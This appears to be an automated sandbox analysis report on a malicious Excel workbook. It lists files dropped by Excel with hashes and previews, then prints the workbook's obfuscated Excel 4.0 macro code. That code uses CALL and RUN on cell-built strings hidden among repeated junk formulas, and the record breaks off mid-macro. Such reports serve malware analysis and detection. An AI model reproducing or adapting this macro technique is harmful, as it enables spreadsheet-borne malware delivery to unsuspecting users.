                              Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):893
                              Entropy (8bit):7.366016576663508
                              Encrypted:false
                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):326
                              Entropy (8bit):3.1408424665520864
                              Encrypted:false
                              SSDEEP:6:kKtpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:FphZkPlE99SNxAhUeSKO
                              MD5:EA98D3F127C3CABE8CD05B5857D3E7AE
                              SHA1:F430374BF30B7E67E9479EEC494098B9F8459E6F
                              SHA-256:2455F8CF07720DEB7D5AEA9475669DF3CD28AA99B604F9B1DA2CD8556945AAE3
                              SHA-512:7B95863B20525FC012A844887650582D01A0DB8B64AF79CFFF56BD519D761446AEA6735299E98B871FB71EDC8D395B2839CC893DD781329655018166C7245B36
                              Malicious:false
                              Reputation:low
                              Preview: p...... ......... gTG..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...
                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):2.982402351126539
                              Encrypted:false
                              SSDEEP:3:kkFklOkNvfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWP:kKdQE1liBAIdQZV7ulPPN
                              MD5:4C8156F5DFDB4C283C66BEBE23B14372
                              SHA1:8DB1B2CB20E1FB9726E5300AB25CE996AC3F1785
                              SHA-256:B110EEE4542F146EB1D69899295BF970DAD1BA620ADEE3A386E31DE68A6EA473
                              SHA-512:E7EE59CA50C2B8D733AEFB12948A9A8718F6490EBC9E4F43E4C68449B7B1DCDBEBFC65EC28956B8F3868B154A3C950ABF88BC99C6657CD80FE3BE1C182428A5D
                              Malicious:false
                              Reputation:low
                              Preview: p...... ....`....h.fTG..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                              C:\Users\user\AppData\Local\Temp\CabEEC3.tmp
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                              Category:dropped
                              Size (bytes):59863
                              Entropy (8bit):7.99556910241083
                              Encrypted:true
                              SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                              MD5:15775D95513782F99CDFB17E65DFCEB1
                              SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                              SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                              SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                              C:\Users\user\AppData\Local\Temp\D3EE0000
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):82714
                              Entropy (8bit):7.903394630547888
                              Encrypted:false
                              SSDEEP:1536:TzvVZfTWnJXXkTVvirJHdJGsF92hjPcQpWUot9Ec:TBZLWnJXXkTVviNHdJGUopH8x+c
                              MD5:A14ED619156D8222250A988FEF1BAD6F
                              SHA1:9793D9BC72BF2A91A014AA5F68372E51F6D030A0
                              SHA-256:532142248DA28E7A49DA313DA5A2BEAE27560F0F55EAB70DDA433B921CDA8CCB
                              SHA-512:CC04550A1A9E64F0CF23F401FC31013F83A9DFD43198CAB80629B995A08F873E5C52A21C871F9F1189C104ECCA76A052DBD1A05B170D72CDFF552A2508A11F7D
                              Malicious:false
                              Reputation:low
                              Preview: .U.n.0....?..........C....I?.&..an.0........%..h!..y...5..D.......J..e....o..$...;h....,>..?m.`Eh.-.S..9G......fV>Z..5v<........+..%p.N..-.?a%.M.n74.s..U?v.e......".Q...H.W+-Ay.l....A(...5M....#.D.!.'5..4....iD..G......B.R....PX.(..s..~..F..z.1..Ki..>.....$9L.5l$..$.X!..ubi..vo..(.$.r..!..&9.~..B<...j.P._.T....^&C.... .Q..J.../......ik.GD7e..H..{.A=&j.....{....5[....s.......}@j.......2..D.1i8..S..H.q..Qg.|H(P'.y9..........PK..........!..!.9............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\TarEEC4.tmp
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):156386
                              Entropy (8bit):6.3086528024913715
                              Encrypted:false
                              SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                              MD5:78CABD9F1AFFF17BB91A105CF4702188
                              SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                              SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                              SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: 0..b...*.H.........b.0..b....1.0...`.H.e......0..R...+.....7.....R.0..R.0...+.....7........5XY._...210419201239Z0...+......0..R.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 16:29:43 2021, atime=Wed May 12 16:29:43 2021, length=8192, window=hide
                              Category:dropped
                              Size (bytes):867
                              Entropy (8bit):4.487720889311811
                              Encrypted:false
                              SSDEEP:12:85QBmMmyLgXg/XAlCPCHaX2B8GB//oUepX+WnicvbSR9bDtZ3YilMMEpxRljKt2s:85ZMmE/XTm6GgpYe6Dv3qlrNru/
                              MD5:ECB8FA45F62B7D1E95F493B242F982B5
                              SHA1:544277E75E8186E5C03980DB1C9DC3FFD612D77F
                              SHA-256:E62015D22528CED919EC03AD15B583D6BBAFA6FED394435630AC6E6C184A886A
                              SHA-512:B595D2102C59E9B3B43DC7400FF8652A880B94A7886CB0BD4DBC061E2097DEF2C57FF6FC28D181B3ABBEE50AD119F36C421BD946260E1D924341C1ED34E6A39A
                              Malicious:false
                              Reputation:low
                              Preview: L..................F...........7G...3.eTG...3.eTG... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalog-1908475637.LNK
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed May 12 16:29:43 2021, atime=Wed May 12 16:29:43 2021, length=179200, window=hide
                              Category:dropped
                              Size (bytes):2108
                              Entropy (8bit):4.53768038975347
                              Encrypted:false
                              SSDEEP:24:8af3E/XTm6GreV/xeECDv3qldM7dD2af3E/XTm6GreV/xeECDv3qldM7dV:8a8/XTFGqzblQh2a8/XTFGqzblQ/
                              MD5:2D22D98B0C3DE0097A620EA7D773F322
                              SHA1:243BC5414C42D669B625B0D97EB975B64931D49B
                              SHA-256:86869EAF6DF3C1D014579B94D6C808D524D9FC730270AF5938B94C2253104FD6
                              SHA-512:81BBD3585E3B6F84249047C5EB7BFD36F1BD3E05D0345B0EC41D41B8E909CDEFC0E99A4AAA44547EB046F6713376FF0F1613FF5E52201D6C45EAE035FEFAC00B
                              Malicious:false
                              Preview: L..................F.... ........{...3.eTG.....eTG...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......R.. .CATALO~1.XLS..Z.......Q.y.Q.y*...8.....................c.a.t.a.l.o.g.-.1.9.0.8.4.7.5.6.3.7...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\catalog-1908475637.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.t.a.l.o.g.-.1.9.0.8.4.7.5.6.3.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W..
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):107
                              Entropy (8bit):4.801242804439033
                              Encrypted:false
                              SSDEEP:3:oyBVomMgeThp6YCeJreThp6YCmMgeThp6YCv:dj6tTrJyTrUtTrs
                              MD5:B3B278B32E27F861DCE26F203B5389CE
                              SHA1:72C194F58B7E4F2E2D551BA0B7CE02412FF5290E
                              SHA-256:5394C095E79C2AB8490B91D0A0851B476569258F339604B07E2CFE4872FF96CC
                              SHA-512:62CD5E8F374EDDC7FC72631F6CB07B7A0C8655423DF7373A337068DB9FD2B06F35BFBAD04E4A24562497F7CC406CFB8A9C34413B36D40A5E640D38F54A88DAAA
                              Malicious:false
                              Preview: Desktop.LNK=0..[xls]..catalog-1908475637.LNK=0..catalog-1908475637.LNK=0..[xls]..catalog-1908475637.LNK=0..
                              C:\Users\user\Desktop\A4EE0000
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Applesoft BASIC program data, first line number 16
                              Category:dropped
                              Size (bytes):229581
                              Entropy (8bit):5.4197026558283925
                              Encrypted:false
                              SSDEEP:3072:328jF6odD8l+BnuSWikujkz3j1PTMTHvznDKnpnF28jPl:tF6K8lnVPl
                              MD5:BCC2F50043814CDFBE67ED0F834146AD
                              SHA1:256D88A677B5FB27F4BBCDDAB621CD2C174CFA20
                              SHA-256:6571AE6819E29003D7EA3CEE4B767940C2CE0933EEE0D4B69934C42D2F1D9860
                              SHA-512:6BA80CD05BF8A96B4B15F14478602C18496EC2AB9D16CE532120D4DF491B263E51C8E0B9B87D365C799C4957AF445D63C9E09C874C7BB46B76F698BDBF7FEEEB
                              Malicious:false
                              Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

                              Static File Info

                              General

                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue May 11 10:24:38 2021, Security: 0
                              Entropy (8bit):3.2586605774114124
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:catalog-1908475637.xls
                              File size:380928
                              MD5:1de5671f987904abf6caa9aacb029d88
                              SHA1:42fdd77f2c2ae74a92c9ba9bd3ddcd2855b1ea06
                              SHA256:ae321f6cf2fff1dee8da9df91a49b43d4d24850362861929031b45d7d5399c6a
                              SHA512:cc426b4b88b20089ae5e15617e9db3cbdb3c4a42bd2e50458e76a166923107eadf9ca0de566f3cdaa9d7fa0bb285f6202cb72a22863ef8767172b0d50eb31395
                              SSDEEP:3072:uwmQVVgt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/ERRKxx0wV4acr2/ChC5PlgO:VmHt6Uqa5DPdG9uS9QLlV4agcyW
                              File Content Preview:........................>......................................................................................................................................................................................................................................

                              File Icon

                              Icon Hash:e4eea286a4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "catalog-1908475637.xls"

                              Indicators

                              Has Summary Info:True
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:True

                              Summary

                              Code Page:1251
                              Author:van-van
                              Last Saved By:vi-vi
                              Create Time:2006-09-16 00:00:00
                              Last Saved Time:2021-05-11 09:24:38
                              Creating Application:Microsoft Excel
                              Security:0

                              Document Summary

                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Contains Dirty Links:False

                              Streams

                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.293096326749
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.282028019457
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . v G F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 368576
                              General
                              Stream Path:Book
                              File Type:Applesoft BASIC program data, first line number 8
                              Stream Size:368576
                              Entropy:3.24780806725
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                              Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                              Macro 4.0 Code

                              CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                              
                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(